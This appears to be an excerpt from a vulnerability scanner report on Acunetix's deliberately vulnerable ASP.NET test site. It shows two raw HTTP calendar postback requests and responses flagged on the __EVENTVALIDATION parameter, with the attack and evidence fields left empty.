Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8623&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCA7uf9mdsIZGRkUOCC%2Fqr1gDKjGJs9HYPc4dwJ3QY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLax6S0BwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPoga2SI0pG6KV%2BCEaZJD03sunjonfjw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:41 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCA7uf9mdsIZGRkUOCC/qr1gDKjGJs9HYPc4dwJ3QY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLax6S0BwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPoga2SI0pG6KV+CEaZJD03sunjonfjw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:White" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1145 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,145 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8134&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDA7uO7GdoIZGRk5YnVLlJz2dBioFHCU8AEh4Ripec%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLAzL4%2BAqDc%2BbwPArrjr%2BwOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY%2FeCQLmnY%2FeCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf%2FDDALmnf%2FDDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne%2B5AwLmne%2B5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU%2FAvuktT8C%2B6Sp0gkC%2B6Sp0gkC%2B6Td9gIC%2B6Td9gIC%2B6TxjQoC%2B6TxjQoC%2B6TloAMC%2B6TloAMC%2B6SZxwwC%2B6SZxwwC%2B6TNrAkC%2B6TNrAkC%2B6ThwwIC%2B6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP%2BQ8C3MuP%2BQ8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL%2F%2BoCAtzL%2F%2BoCAtzL09MPAtzL09MPAtzLx%2FYIAtzLx%2FYIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS%2BckMArHS%2BckMYyQ6JPtfloF4HWCe%2BcaP4mUrboY%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:42 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDA7uO7GdoIZGRk5YnVLlJz2dBioFHCU8AEh4Ripec=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLAzL4+AqDc+bwPArrjr+wOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY/eCQLmnY/eCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf/DDALmnf/DDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne+5AwLmne+5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU/AvuktT8C+6Sp0gkC+6Sp0gkC+6Td9gIC+6Td9gIC+6TxjQoC+6TxjQoC+6TloAMC+6TloAMC+6SZxwwC+6SZxwwC+6TNrAkC+6TNrAkC+6ThwwIC+6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP+Q8C3MuP+Q8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL/+oCAtzL/+oCAtzL09MPAtzL09MPAtzLx/YIAtzLx/YIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS+ckMArHS+ckMYyQ6JPtfloF4HWCe+caP4mUrboY=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:White" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
